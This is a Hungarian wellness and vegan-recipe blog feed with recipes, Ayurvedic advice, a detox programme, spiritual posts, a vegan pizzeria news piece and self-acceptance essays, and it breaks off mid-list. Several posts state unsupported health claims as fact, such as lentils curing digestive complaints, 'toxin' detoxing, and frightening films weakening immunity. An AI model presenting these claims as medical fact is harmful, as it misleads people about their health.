Talán még nem késő, talán még te is találsz virágzó bodzabokrot. A szörpöt két hete készítettem és a mai sétánk során is találtam még virágzó bodzabokrot, nem is egyet, igaz szinte mindegyik fele már kezdett zöld bogyókat hozni a virágok helyett. Ha idén le is maradnál, de következő bodzavirágzás idején keresgélsz, jól jön számodra a recept, hogyan készítsünk bodzaszörpöt fehér cukor nélkül.
A recept:
Hozzávalók:
- kb 20-30 szál frissen szedett bodzavirág
- 1-2 citrom
- agavé vagy datolya szirup vagy méz vagy más édesítő (pl: gyümölcscukor, barnacukor, stb.)
- 3 l víz
- tartós elrakáshoz üvegek
Elkészítés:
A vizet felforraljuk, hozzáadjuk az édestőszert, elkavarjuk, majd belehelyezzük a rovarmentes bodzavirágokat, ismét átkeverjük. Az egyik citromot kicsavarjuk és hozzáadjuk, a másik citromot karikákra vágjuk és beletesszük. Így áztatjuk a bodzavirágokat 1-2 napig, hűtőben tárolva.
Amikor készen állunk a télire való eltevésre, az üvegeket forró vizes tepsiben kiforrázzuk, csírátlanítjuk. Közben a bodzalét leszűrjük, felforraljuk. A kiforrázott üvegekbe töltjük forrón, majd lezárjuk őket és személy szerint én meleg dunsztba tettem őket és ott pihentek amíg ki nem hűltek.
Ez a szörp nem lesz olyan sűrű, mint a bolti, hiszen nem cukorból készült szirup, de hígítható és frissítő italként szolgál akár mentes vagy szénsavas vízzel (szódával). Felhasználható teák édesítésére is.
Az édesítők mennyiségét úgymond ízlelés alapján mindenki a maga édes érzetének megfelelően választhatja meg. Attól is függ a mennyiség, hogy milyen édesítést használunk.
Arisztotelész - a gyönyörről
2022. június 21. Élj harmóniában
Aki erényes éltetét él, az tapasztalhatja életében a boldogságot, kiegyensúlyozottságot, az elméje mindig tud elégedett lenni és jó eséllyel könnyebben megőrzi az egészségét is. A mai modern világban nem becsüli a társadalom az erényt, sokszor az erényes emberek gúny tárgyát képezik. A fókuszban leginkább a profittermelés, pénzszerzés, felfokozott tempó, önközpontúság, az akadályok mindenáron történő elhárítása, normákat felrúgó viselkedés áll. Nem értékelik eléggé, ha valaki kiáll az elveiért, még akkor is ha az neki hátrányokkal jár, ha nem akar ingyen nyomtatni a cégénél, hanem inkább otthonra vásárol nyomtató papírt, ha valaki tisztességesen adózik, ha egy nő megvárja a házasságot a szüzessége elvesztésével, ha valaki mértékletesen étkezik, megválogatja mit eszik, ha valaki nem rendelkezik hívságokkal, etc.) Az erkölcsi kiválóság ma sok esetekben hátrány, mint előny. A fiatalok előtt nagyon gyakran példaképpen erőszakos, pénzközpontú, önközpontú, erkölcsileg hanyatló emberek állnak. A Jóga Szútrák, azt mondja nem szabad lekicsinyelni a mások által elért olyan eredményeket, amely lemondásból, erőfeszítésből, értékteremtő gondolkodásból és tettekből, mások javát, mások segítését szolgálva, erkölcsös viselkedéssel ér el valaki. Azaz az erényes tetteket el kell ismerni és nem szabad lenézni vagy irigynek lenni rá. A legjobb, ha tudunk örülni valakinek aki erkölcsös és inkább mintául vesszük az életét, megpróbáljuk követni őt.
Cseresznyés morzsasüti (crumble)
A gyümölcsös crumble vagy morzsasüti az egyik leggyorsabb nyári édesség. A szezonális gyümölcs tetejére lisztből, vajból és cukorból álló morzsát szórunk és már toljuk is a sütőbe. Hozzávalók: 10 dkg liszt 5 dkg apró szemű zabpehely 10 dkg vaj 8 dkg cukor vagy ennek megfelelő édesítőszer 8...
A vegetáriánus gyerekek növekedése és táplálkozása hasonló a húsevőkéhez, de van egy fontos különbség
Nem kizárt, hogy egy gyermek teljesen egészségesen nőjön fel hús nélkül, ám a vitaminpótlás kulcskérdés ebben az esetben is.
A vöröslencse hatásai
2022. május 14. Élj harmóniában
A vöröslencse (Masoor Dal) egy szuper tápláló élelmiszer. Mivel a fehérjetartallma elég magas, így kiváló fehérjeforrás is. Nagyon jó vasforrás, jó vérképző és májtisztító. A vöröslencse a hüvelyesekhez, babfélékhez tartozik és elsődlegesen a levegő és föld elemet képviseli. Ájurvédikus szempontból stabilizáló, elnehezító és nehezebben emészthető etlenek minősül, mert hosszú idő mire megemésztődik. Szárító hatása van, így vata alkatúaknak óvatosan kell fogyasztani, legfelejebb heti 2 alkalommal. Ideális pitta és kapha alkatúak számára. Ájurvédikus szempontból édes és fanyar, így egyfajta összehúzó, kiszárító hatást is gyakorol a szervezetedre. Ez egy hűtő hatású hüvelyes, ezért nyáron ideális a fogyasztása. A vöröslencse növeli az Ojast ami az egészséges szövetekért, az immunitásért, a stabil energia ellátásért és a boldogság érzetésért felel a testedben. Amikor valaki legyengült állapotban van, vagy az immunrendszere nem elég erős, olyan célszerű olyan ételeket fogyasztani, amik növelik az ojast. Segít csökkenteni az étvágyat, jóllakottságot biztosít, így megakadályozza a súlygyarapodást, ideális fogyókúrához is. Támogatja a belek egészségét, megszünteti a székrekedést és hasmenés esetén is jótékony, mert a belek egészségét helyreállítja. Felhasználása változatos, készíthetsz belőle levest, sűrű főzelékfélét, kenyérhez krémeket, pástétomokat. Összetett szénhidrátot tartalmazó ételekkel szuper teljes értékű fehérjeforrás (pl kenyérrel, tésztával, rizzsel, polentával) Vegyszermentes (bio) vöröslencsét fogyassz!
Lassan belekezdhetünk egy kis méregtelenítésbe
2022. május 2. Élj harmóniában
Úgy tűnik tartósan megérkezett a meleg és reméljük már nem lesznek nagy lehülések. Ilyenkor ideális belevágni, egy kis tisztítókúrába... A tavasz - nyár évszak váltásnál érdemes egy kicsit segíteni a szerveztednek, hogy megszabaduljon a felgyülemlett salakanyagoktól. Idén is megpróbállak végigkísérni, egy hagyományos ájurvédikus méregtelenítő programon, amely ősi, évezredek óta bevált módszereket alkalmaz. A facebbok csoportban tudod nyomonkövetni a psotokat: https://www.facebook.com/groups/189231931805348 Ez a gyengéd, ájurvédikus tisztítás nem csak segít megszabadulni a méreganyagoktól, optimalizálja az emésztésed működését, helyreállítja a életenergiák szabad áramlását, de a test, az elme és a lélek egyensúlyát is. Ha szeretnél belevágni egy otthon is könnyen elvégezhető ájurvédikus tisztítókúrába, íme egy lista miket érdemes beszerezni: Ha valamit nem tudsz beszerezni, jelezd és én beszerzem neked, akár a komplett csomagot is:) - Nyelvkaparó (a jógastúdióban is kapható) - Triphala Churna - Nasya olaj - Gyömbér - Baszmati rizs - Sárga Mung dal - Ghí - Kitchari fűszerkeverék vagy ájurvédikus fűszerek - Ájurvédikus masszázsolaj (pl. szezámolaj vagy doshádnak megfelelő) - vegyszermentes bio zöldségek - bio citrom A tisztítás első lépése, hogy további méreganyagokat ("ama"-t) ne halmozz fel a testedben. Ehhez fel kell hagynod azokkal a kedvezőtlen szokásokkal, melyek elnehezítik a tested, salakanyagokat képeznek. Ugyan télen szüksége volt a testednek a nehezebb ételekre, de most ez már nem így van. Ha sok a salakanyag a testedben, a szervezted éjszaka nem tud megfelelően pihenni és méregteleníteni, ezért reggel fáradtan ébredsz, még akkor is ha eleget aludtál. nem csak az energiaszitned csökken le, de türelmetlen, kedvetlen, motíválatlan, dekoncentrált is lehetsz a felhalmozódott toxinoknak köszönhetően. Első lépés, hogy kezdj el kevesebbet enni és válassz könnyen emészthető ételeket. A fő étkezésed mindig délben legyen és a vacsorára, reggelire csak könnyű, ételeket fogyassz. Késő este már ne egyél. Kerüld el a húst, tojást, sajtot, túrót, joghurtot, zsírós ételeket, csokoládét, alkoholt, kávét, édességeket, nem frissen készült kenyérféléket, állott ételeket. Ne edd túl magad és ne nassolj. Várd meg amíg az előző étel megemésztődött. Ne fogyassz túl hideg ételeket, italokat. Ha lehet válassz friss , vegyszermentes ( bio) , nem feldolgozott, nem tartósított, nem fagyasztott élelmiszereket. Örömteli előkészületeket kívánok :) szeretettel Kati #tavasz #megújulás #emésztés #méregtelenítés #tisztítókúra #éljharmóniában #egészség #immunerősítés
2022. március 18. halmozottan különleges nap :)
2022. március 17. Élj harmóniában
Kedvesek Holnap halmozottan különleges nap lesz! Készülj fel tudatosan! Telihold lesz ami nagyon ideális a meditációra, mert az elme könnyebben tud fókuszálni. Ráadsául az Úr Caitanya megjelenésének napja és az indiai Holi fesztivál kezdetének napja is idén március 18. Az Úr Chaitanya Krisna inkarnációja és a 15. században Indiában elterjesztette a Szent Név éneklését, hogy az emberek megszabaduljanak a szenvedéstől , felszabadulhassanak. Holnap kezdődik a Holi, ami Indiában egyfajta színes tavasz köszöntő, megújulás ünnep - ilyenkor mindenféle színes porokat, festékeket dobálnak egymásra az emberek. Valamint a tibeti hagyományok szerint tízmilliószoros nap is lesz holnap. Azaz ezen a napon minden cselekedeted tízmilliószoros hatással rendelkezik. Érdemes holnap tudatosnak lenned arról amit csinálsz és amit gondolsz. Hassa át a napod a kedvesség, a szeretet, a pozitív gondolkodás, a jószándék, a béke. Próbáld a napodat egyfajta csendes elmélyedéssel, tudatosággal, szabályozottan megélni. Ez a nap a lehető legjobb meditálni, spirituális gyakorlatokat végezni. A legideálisabb mantra a holnapi naphoz, a maha-mantra, ami Krisna neveiből áll. Ez a csodás mantra segít az elmédet békésebbé tenni, csökkenti az életedben a szenvedést, boldogságot hoz neked és segít összekapcsolódni a Legfelsőbbel (Istennel). Ülj le egy helyre, ahol nyugalom és csönd van körülötted és ismételd el ezt a mantrát néhányszor: Hare K???a Hare K???a K???a K???a Hare Hare Hare R?ma Hare R?ma R?ma R?ma Hare Hare Áldásokban gazdag csodás napot kívánok holnapra:) szeretettel: Kati
Egy kis "nemsajttorta"
2022. március 6. Mindennapi ételeink
Ismét egy vegán sajttorta, ezúttal kesudióból. Ez a recept két torta ötvözéséből született meg. Hozzávalók:-piskótához:2,5 dl növényi tej 6 ek. étolaj 2 ek. citromlé25 dkg zabliszt1 tasak sütőpor10 dkg barnacukor /eritrit /nyírfacukor-krémhez:50 dkg natúr kesudió 8 dl lehűtött, sűrű, konzerves kókusztej 8 ek. porcukor 2 ek. citromlé 4 tasak vaníliás cukor Elkészítés: A piskóta alapanyagait összekeverjük (külön a szárazakat, nedveseket, majd az egészet alaposan összekeverjük). És 180 fokos sütőbe téve kb. 25 perc alatt készre sütjük. Benne hagyjuk a tortaformában. A krémhez szükséges kesudiót áztassuk be éjszakára, a konzerv kókusztejet tegyük hűtőbe. Másnap a krémhez a lehűtött kókusztejről vegyük le a szilárd részt és a leszűrt kesudióval, a cukorral, vaníliás cukorral és a citrommal turmixoljuk szét minél lágyabb krémmé. Ha nem elég édes még édesíthetjük. Kenjük rá ezt a krémet a piskótára. Tegyük egy teljes napot hűtőbe. Sok-sok gyümölccsel szoktuk fogyasztani, most csak málnánk volt itthon.
Kókuszcsók
Gluténmentes és vegán
Kb. abbahagyhatatlan ez a kókuszcsók, szóval kis mennyiségnek neki se állj. Én eleve előnyben voltam, mert rengeteg kókuszreszelékem maradt karácsonyról (vagy egy kilóról beszélünk), miután teljesen elszámoltam a mennyiséget a bevásárlásnál. Ööö.. ez még a legjobb házban is előfordul.. :D
Nagyon jókor jött ez a recept most az ovis farsangra. Jó nagy adagot küldtem a gyerekeknek, és nem jött belőle vissza egy darab se! ;)
A végeredmény megfelelően édes, picit sós, tartalmas és könnyű egyszerre. Én nem tettem hozzá plusz cukrot, mert szerintem a kókusz magában is elég édes, a csokiról nem is beszélve. De ha te édesszájúbb vagy, akkor 1-2 evőkanál porcukorral állítsd be az ízét.
Hozzávalók egy nagy tepsihez
- 250 g kókuszreszerlék
- 250 g kókuszkrém (kókusztejszín)
- 1 nagy alma hámozva, lereszelve
- 2-3 csipet só
- 1 csapott mk szódabikarbóna
- 20 g vaníliás cukor
- 90 g étcsokoládé
- 2 kk étolaj
- A kókuszreszeléket keverd össze a többi hozzávalóval (a csoki és az olaj kivételével). Gyönyörűen ragadós masszát kell, hogy kapj, olyat, ami egyben marad, ha az edény falához nyomod. Tapasztalatból mondom, hogy a forgalomban lévő kókuszreszelékek nagyon eltérő minőségűek. Nem véletlenül sokkal olcsóbb az egyik és kicsit drágább a másik. Előfordulhat, hogy a legolcsóbb fajtából kivonták a kókuszzsírt, amitől nehezebben áll össze a masszád. Ilyenkor egy kis vízzel vagy még inkább olvasztott kókuszolajjal tudsz segíteni a dolgon.
- Hagyd állni pár percet, addig melegítsd elő a sütőt és bélelj ki egy tepsit sütőpapírral. Fagyis kanállal (vagy bármilyen mélyebb, öblös kanállal) formázz belőle félgömböket, és helyezd a tepsibe őket.
- 200 fokon süsd 20 percet kb, amíg szép barna nem lesz a teteje.
- Ha kihűlt, csepegtesd meg a csokoládéval. Ehhez tedd egy pohárba az összetört csokit, locsold meg 5 kk vízzel és az olajjal, majd melegítsd össze őket, lehetőleg forró vizes tálban. Húzd egymáshoz közel a kókuszcsókokat, és egy kanállal rázd rá a csokit.
A hűtőben tárolást szereti. :)
Jó étvágyat!
Elkészítési idő: 25 perc
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Vegán Szaloncukor-készítő
Kezdő Vegán
Haladó vegán (Superfood)
Növényi tejtermékek
Görög vegán
Vegán MUST HAVE – a kötelező alapcsomag
Ez egy vegán recept volt. :)
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
The post Kókuszcsók first appeared on Kertkonyha.
A 125 éves pesti vegán hagyományokat ünnepli a GreenGorilla pizzéria
2022. február 10. Vegetáriánus receptek
Évszázados híreket olvashatunk mostantól a GreenGorilla pizzéria dobozaira nyomtatva. Az akció célja ismeretterjesztés: a hajdani újságcikkekből ugyanis kiderül, hogy a vegán életmódnak milyen komoly múltja van már a magyar fővárosban. Így például eddig valószínűleg kevesen tudták, hogy a Millenium évében is volt már Pesten a konyháján minden állati eredetű összetevőt mellőző étterem.
A tavaly nyáron megnyílt GreenGorilla a fővárosban jelenleg az egyetlen olyan beülős pizzéria, ahol kizárólagosan növényi alapanyagokat használnak. Utóbbi egy vegán helyen persze magától értetődő ez a fajta tudatosság itt ugyanakkor kiterjed a pizzériában előforduló összes, állatkísérlet-mentes mosogató és tisztítószerre, ahogyan az újrafelhasznált és lebomló csomagolásokra is. A pizzéria most a teljesen növényi eredetű étkezést népszerűsítendő kampányba kezdett, amelyből kiderül: Pesten már 125 éve is volt vegán étterem.
Jelenleg sokan úgy gondolják, hogy a vegán életmód valamilyen múló újdonság, újkeletű divathóbort. A magunk lehetőségeivel most mi is szeretnénk hozzájárulni ahhoz, hogy eloszlassuk ezt a tévedést, és ezáltal is mind többen kedvet kaphassanak a növényi alapú étkezéshez. A múlt ismerete nélkül nincsen jövő. Ezért jelentetjük meg újra azokat az újsághíreket a pizzásdobozainkon, amelyek még Budapest vegán történelmének hajnalán keletkeztek mondja Bíró Attila, a GreenGorilla alapítója.
Archív cikkes pizzásdoboz és lencsés pizza
A dobozokra került például a Pesti Hírlap egy 1899-es cikke, amelyből kiderül, hogy egy és negyed évszázada, a millennium évében, 1896. május 3-án létesítette egy Schulz Janka nevű berlini nő a Pipa utcában az első vegetárius-éttermet. A Pomona nevű helyről pár évvel később a Magyarország című lap már mint vegán étkezdéről emlékezik meg, mondván: vendéglőnek elég különös, mert nemcsak szeszes italokat nem adnak benne, de húst, vagy állati termékeket sem. Ezek az archív cikkek a GreenGorilla pizzásdobozokon most teljes terjedelmükben elolvashatóak.
A Dohány utca 88. szám alatt található GreenGorilla, amely egy szinte teljes egészében növényi táplálkozást folytató főemlősről kapta a nevét, a vegán elkötelezettségtől eltekintve a pizzasütés klasszikus hagyományait követi. A tészta készítéséhez kizárólag olasz pizzalisztet, sörélesztőt, szárított kovászt, extra szűz olívaolajat, valamint sót használnak. Erre kerülnek a saját recept alapján kreált szószok, a paradicsomos öntet és a bolognai, valamint a nemtejfölös alapok és persze a vegán feltétek is. Pizza alapanyagok esetében a sajt kulcskérdés: itt Hárskúti Attila kisüzemi körülmények készült, a vegán közösségben évek óta népszerű növényi sajtja olvadozik a pizzarétegek tetején. Giuseppe Cuoco, az olasz pizzaszakács pedig salernói és milánói kemencék mellett alapozta meg pizzasütő tudományát. A 125. évfordulóról megemlékezve a GreenGorillában a bolognai pizza most lencsével készül, mivel utóbbi az egyik kiemelt alapanyag volt a már említett Pomonában.
A pizzériában dolgozók egyenként is elkötelezettek az állatvédelem mellett. Közülük Bíró Attila éveken keresztül segítette a Füzesabonyi Állatvédő Alapítvány munkáját, a hagyományt folytatva pedig adománygyűjtő napokat is tartanak az üzletben - ilyenkor minden pizzából 500 Ft az Alapítvány számlájára kerül. A Jane Goodall Intézettel is együttműködik a GreenGorilla. Egyebek mellett úgy, hogy gyűjtőpontként funkcionál a már használhatatlan mobilkészülékek számára az Intézet által indított kampányban, megnyerhető pizzával és kisebb ajándékokkal bátorítva a telefonok, tabletek, fülhallgatók leadását. (A mobiltelefonokhoz szükséges ércet Afrikában gorillák és csimpánzok élőhelyén bányásszák, felemésztve erdeiket - a készülékek újrahasznosítása világszerte ezen a kritikus problémán is igyekszik enyhíteni.)
Világszerte terjed a vegán és vegetáriánus életmód, itthon is
Az állati eredetű származékokat teljesen mellőző életmód az egész világon egyértelműen növekvő trend: az Egyesült Államokban a vegán populáció 15 év alatt 300 ezerről a konzervatív becslések szerint is 10 millióra nőtt, míg egy másik, korábbi felmérés 20 millióra tette az amerikai vegán lélekszámot. Németországban például a 18-29 évesek 11, Lengyelországban 7 százalékuk már teljesen növényi alapú étrendet követ. Itthon egyelőre nincsenek megbízható releváns adatok, a vegán táplálkozás hívei Magyarországon körülbelül a populáció 1-2 százalékát tehetik ki.
Más kultúrákban a nem feltétlenül vegán, de húsmentes étkezésnek eleve történelmi hagyományai vannak: India például a társadalmi méretekben elterjedt vegetarianizmus egyik iskolapéldája. A dél-ázsiai országban élők közel 40%-a ilyen étrendet követ, Jamaicában és Vietnámban pedig körülbelül 10% ez az arány.
A GreenGorilla kínálata a Dohány utcai üzleten kívül több ételfutár weboldalán is elérhető.
Győri Ildikó
TEST KÉP
2022. január 21. Élj harmóniában
Sokszor hallom a tanítványaimtól, ismerőseimtől, hogy elégedetlenek magukkal, aggódnak nem néznek ki elég jól. Manapság mindenhonnan ömlenek az emberekre a hamis szépségideálok, a hazug üzenetek, irreális testkép mintázatok, az örök fiatalság ígérete és sokan - főleg hölgyek - szoronganak a kinézetük miatt, hogy nem elég szépek, nem elég jók, nem elég szerethetőek. A média árasztja a megcsinált mosolyokat, a szépséges, de nem saját hajas hajkoronákat, a dús kebleket, a feltöltött ajkakat, a kockás hasakat, izmos karokat, a 65 körüli ránctalan sztárokat, az ügyes megvilágításokat, a photoshop-polt képeket, a tökéletes testeket és hosszasan sorolhatnám. Ha valaki sokat nézegeti ezeket, még a végén kétely ébred benne, hogy ő nem jó úgy, ahogy van. Egyszer állj meg a Nyugatinál és ott nézegesd az embereket és nézd meg hogy néznek ki - a legtöbb ember nem hasonlítható a címlapokon szereplő képekhez:)) Ha nehezebben fogadod el magad, érdemes többet nézegetned az átlag embereket, mint az óriásplakátokon, internetes oldalakon, televízióban szereplő modelleket. Sajnos néha a fiúk hajalmosak túl sok realitástól távol álló hölgyet nézegetni és ezzel csak megfosztják magukat és a társukat az egészséges vonzódástól, gyönyörködéstől, boldogságtól. Van aki azért aggódik, hogy nem elég kockás a hasa, van aki azért mert nem elég szép a mosolya, van akit a kerekdedsége zavar, van akit a kis melle. Senki nem tökéletes... A Teremtő az egyetlen aki tökéletes, ha a tökéletességre törekszel, az olyan, mintha Te szeretnél lenni Isten:) . Mindannyian a teremtés csodás remekművei vagyunk. Minden ember egyedi, csodálatos és megismételhetetlen. Mindannyiunknak vannak csodás kincsei és vannak olyan dolgok, amik nem az erősségeink, akár fizikális, akár mentális tulajdonságainkat nézzük. Nincs szebb annál, mint amikor valakiből sugárzik, hogy tudja szeretni és elfogadni önmagát és másokat. Elfogadni a korodat, az egyéni alkatodat. Értékeld az életedben a pozitív tulajdonságaidat, légy hálás értük és próbáld az erősségeid mentén élni az életed. Ha van mit adnod a családodnak, barátaidnak, az embereknek, akkor csodálatos vagy mert boldoggá tudsz tenni másokat. A férjed, feleséged, társad azért választott Téged, mert Te tetszettél neki és nem Claudia Schiffer vagy valamilyen modell:) Te mennyit kritizálod magad? Egy ember önmagáról alkotott képe jelentősen meghatározza, hogy mások hogyan tekintenek rá. Ha nem tudod magadat elfogadni, azt mások is megérzik, ráadásul amikor találkozol valakivel, először a hibáit fogod észrevenni és nem a kincseit. A gondolataid kiülnek az arcodra, megmutatkoznak a testtartásodban, a lelkiállapotod sokkal nagyobb hatással van a megjelenésedre, mint a a külső dolgok. Ha szép a mosolyod, akkor ne arra koncentrálj, hogy vastag a lábad, örülj a szép mosolyodnak és viseld büszkén. Ha bármikor azt veszed észre, hogy kritizálod magad, akkor legalább ugyanannyi időt szánj arra, hogy bókolsz magadnak, dícsérd az előnyös tulajdonságaidat.:) Mások előtt, főleg a társad előtt ne kritizáld magad. Ne akard az ő irántad érzett vonzalmát, azzal letörni, hogy mindenáron a negatív dolgokat emeled ki. Inkább nézd meg milyen tekintettel néz rád és ez segít majd növelni az önbizalmadat. :) Te is erősítsd a társad önbizalmát... bókolj neki, dícsérd azon dolgokat amik tetszenek benne... és soha ne hasonlítgasd a média által bemutatott ideákhoz. Ájruvéda szempontból mindannyian egyéni alkatok vagyunk és a dósák (Vata, Pitta, Kapha) keveredése határozza meg fizikális és mentális tulajdonságainkat. Van akinek vékony a lába, töredezett, vékony szálú a haja, szárazságra hajlamos a bőre, van akinek kisportolt az alakja akkor is, ha nem csinál semmit, van akinek dús a haja, van akinek nagy fehér fogai vannak, van akinek picik a körmei, van akinek keskeny a szája... de mindenki szép úgy ahogy van. Szeresd és fogadd el magad, táplálkozz egészségesen, mozogj rendszeresen, légy mindig ápolt, gondolkodj pozitívan és koncentálj az erősségeidre. Az is fontos, hogy ne hagyd el magad, és nem jó ha úgy elhízol, hogy az egészséged rovására megy, ilyenkor egy kis odafigyeléssel igyekezz mielőbb helyreállítani az ideális testsúlyodat. Szeresd Magad! Ne engedd, hogy a külső világ eltorzítsa az elképzelésed önmagad egyediségéről, szépségéről. szeretettel Kati
Spenótos (édes) amerikai palacsinta
2021. december 27. Mindennapi ételeink
Nem szoktunk sűrűn édeset reggelizni, legalábbis a gyerekek többször vágynak sósra. Azért előfordul zabkása, köleskása, vagy pl.turmixok, smoothie-k (ez utóbbikba szokott kerülni friss spenótlevél is). most arra gondoltam, amerikai palacsintát készítek, amibe teszek a tésztába spenótot (mostanában nehezen fogy főzelékként, így fasírtba, tésztához való szószokba csempészem bele. Hagyományos palacsintát már készítettem: a palacsintatésztába kevertem a megfőzött, összeturmixolt spenótleveleket és egy vegán krémsajtos tölteléket kapott. De volt spenótos krémmel töltött sós palacsinta is nálunk. Ezúttal most amerikai palacsintát készítettem és a tésztájába csempésztem bele a zöldséget. Hozzávalók: 10 dkg liszt10 dkg zabliszt 1 ek. sütőpor4 ek. olaj 3 dl növényi tej vagy víz só2 marék spenótlevél megfőzve, turmixolvaElkészítés:A liszteket összekeverjük a sütőporral, hozzáöntjük a vizet vagy semleges ízű növényi tejet, az előzetesen megpárolt, összebotmixerezett spenótleveleket, az olajat és az egészet csomómentesre mixeljük. Olajjal kikent serpenyőben kisütjük. Gyermekeink vaníliapudinggal és darált dióval szeretik , mi akár magában, gyümölcsökkel, lekvárral, juharsziruppal vagy mézzel nyakonöntve.
Karácsonyi csokis muffin
2021. december 23. Mindennapi ételeink
Kóstoltátok már a csupa-csoki karácsonyi muffint? 5 perc az elkészítési ideje, szóval megéri kipróbálni, ha még szükség van édességre, ne halogassátok elkészíteni. A recept Kristóf receptje. Hozzávalók:2 csésze liszt (ebből nekem 1 csésze zabliszt)1 zacskó sütőpor 1 csésze barnacukor0,25 dl olaj 1 csésze Alpro csokis szójatej (bármilyen tej, vagy víz is jó) 1 csésze mindenféle finomság vegyesen: mazsola, aszalt áfonya, dió, mandula, csokichips Elkészítés:Külön összekeverjük a nedves és a száraz hozzávalókat is. Majd egybeöntjük és finoman összekeverjük a kettőt. Utána hozzáadjuk a finomságokat. 180 fokon kb 20-22 percig sütjük. Mi most még a tetejére olvasztottunk csokit is :-D
Boldog Karácsony egyedül
2021. december 17. Élj harmóniában
Korábbi korokban az emberek közösségekben éltek. A közösség legkisebb egysége a család volt és a család nem 3-4 főt jelentett, mint manapság, hanem beletarozott a rokonok jelentős része. Egy egy ünnep vagy akár családi tevékenység (aratás, házépítés, etc.) mindig nagyon sok fő részvételével zajlott. Mai modern társadalmunkat egyfajta elmagányosodás jellemzi és egyre több az egyedülálló ember, aki mellett karácsonykor nincs senki. Sokan előre aggódnak, az egyedül töltött ünnepek miatt és vannak, akiknek csak az ünnepek alatt jelentkeznek nehéz pillanatok. Ne engedd át magad a szomorúságnak, önsajnálatnak. Attól, hogy egyedül vagy lehet szép és boldog a Karácsonyod - ez csak rajtad múlik. Amikor az ember elkezd szomorkodni, negatívan látni a dolgokat, úgy érzi nagyon nehéz az élete érdemes nem beleengedni magát ebbe az érzésbe és beavatkozni, változtatni a negatív hangulaton. Minél inkább hagyod, hogy úrrá legyen rajtad a csüggedés, annál nehezebb lesz örömet tapasztalnod. Előzd meg a búskomorságot tudatossággal. Fókuszálj az életedben inkább, a pozitív dolgokra, kerüld a negatív, lehúzó könyveket, filmeket, zenéket embereket, gondolatokat. Előre tervezd meg , hogyan fogod tölteni ezt a néhány napot. Ezzel az írásssal próbálok segíteni abban is, ha nagyon elragadna a rosszkedv, mi az amivel át tudod billenteni a hangulatod kedvező irányba:) 1. VendégeskedjMost végre lesz időd vendégeskedni. Találkozz olyan barátokkal, családtagokkal, akikkel jó a kapcsolatod és tudod, hogy jó hatással van Rád a velük való találkozás. A találkozókat időbe kezd el szervezni, ne 24-én kezdj telefonálgatni:) Menj vendégségbe és Te is hívj vendégeket. Amikor vendégeket fogadsz, az kellemesen leköti majd a gondolataidat és az idődet is. 2. Tegyél rendetEz az időszak jó lehetőség arra is, hogy kicsit átnézd a dolgaidat, esetleg selejtezz, elajándékozz olyan dolgokat, amiknek Te már nem veszed hasznát. Takaríts ki, szépen díszítsd fel a lakást, hogy igazán jól érezd magad az otthonodban. 3. Mozogj A testmozgás segít megszabadulni a feszültségektől, jobb alvást biztosít és boldogság hormonokat termelsz mozgás közben. Sétálj a friss levegőn minden nap legalább 30 percet. Ha bármikor nagyon feszült vagy depis vagy, menj és sétálj a természetben, azzonnal fogod érezni, ahogy az elméd megnyugszik. A sétát egészítsd ki valami otthoni mozgással is pl. jóga, thai chi, torna, pilates vagy táncolj a lakásban:) 4. Adni jobb, mint kapni Gondoskodj másokról, segíts a rászorulókon. Amikor egy barátom panaszkodik milyen depis, rémesnek érzi az életét, szoktam mondani főzzön néhány adag ételt, vigye ki a hajléktalanoknak és beszélgessen el velük, milyen az életük és rá fog jönni, neki semmi baja:) Segíts a környezetedben élőknek, főzni, takarítani, kutyát sétáltatni bevásárolni vagy különböző alapítványoknál is tusz segíteni ételt osztani, beteg gyerekeknek mesét olvasni, etc. Mások segítése örömet okoz neked is és segít érezni, hogy hasznos vagy, szükség van Rád. 5. Olvass Most végre van időd olvasni. Válassz olyan könyveket, amik jó hangulatúak, felemelőek. Akár elmélyedhetsz valamilyen spirituális írásban is vagy foglalkozhatsz kicsit önfejlesztéssel. 6. Nézz filmeket Keress vidám hangulatú, kedves filmeket, vígjátékokat vagy akár olyan filmeket, amikben sok szép táj van napfényes jelenetekkel. A lényeg a jó hangulat, a mosoly, a nevetés. Amikor nevetsz az oldja a szorongást, boldogsághormonokat termel. Kerüld a túl izgalmas, depis, agresszív és rémísztő filmeket is, mert a szervezeted olyankor negatívra kapcsol és ez immunszupresszív, azaz még az immunrendszeredet is gyengíteni fogod. 7. Teremts stabil alapokat Ahhoz, hogy egy ember élete stabil legyen a legjobb út, a stabil napirend. Ha megnézed a sikeres üzetemberek, uralkodók, multi milliárdosokban egy közös dolog mindig van és ez a stabil napirendjük. Az ébredés és lefekvés ideje, a reggeli, ebéd és vacsora ideje jó ha minden nap ugyanazon időpontban van. Most nekikezdhetsz akár egy jó kis napirend kialakításának is. A napirendhez további információkat egy korábbi bejegyzésben itt olvashatsz 8. Szépülj Ne hagyd el Magad akkor se, ha otthon leszel egyedül. Szánj időt az ünnepek alatt arra, hogy szépnek érezd magad. Öltözz fel csinosan, sminkelj - ha férfi vagy borotválkozz meg:). Végezz ájurvédikus önmasszázst (leírást itt találod) Kényeztesd magad különböző szépségápolási készítményekkel. 9. Egyél jókat Az ünnepekre előre tervezd meg milyen finomságokat fogsz készíteni és szerezz be minden alapanyagot. Ha eddig nem főztél, kiváló lehetőség, hogy belekezdj a konyhatündérkedésbe:) Próbálj ki új ételeket, esetleg olyan alapanyagokat, amit évközben nem engedsz meg magadnak. Válasz olyan recepteket amik gyorsan, könnyen elékszíthetőek - ne kelljen egész nap a konyhában állnod - és valamennyire még egészségesek is:) Itt a blogon is nagyon sok receptet találsz. Élvezd a főzést és az étkezéseket is. 10. Énekelj, táncolj, rajzolj A művészetek, mint terápia is működnek, mert felszabadítanak, elvonják a figyelmed a búskomorságról, javítják a koncentrációd és bizonyos képességeket. Ha nagyon rád törne a magány, énekelj lélekemelő, vidámságot hozó dalokat, akár táncolj is hozzá, csak ne hagyd magad belesüppedni a depibe. Ha tudsz rajzolni, keress valami szép részletet, ami meg tud fogni és rajzold le - csendélet a lakásban, vagy a természet, a fák, növények vagy a házak egy utcában, karácsonyi fények, etc. Keress bármit aminek kellemes a hangulata. Akár egy régi szép napsütéses nyári fotót is kereshetsz, erdőt, tengerpartot és megpróbálhatod lerajzolni. 11. Aludj eleget A megfelelő alvás elengedhetetlen az idegrendszered kiegyensúlyozott működéséhez. Ha nem alszol rendesen, akkor kedvetlenebb, feszültebb, depisebb lehetsz. Este próbálj időben (22:00-ig , legkésőbb éjfélig) lefeküdni és reggel időben felkelni (legkésőbb 08:00-ig). A pihentető alvásról az alábbi bejegyzsében olvashatsz 12. 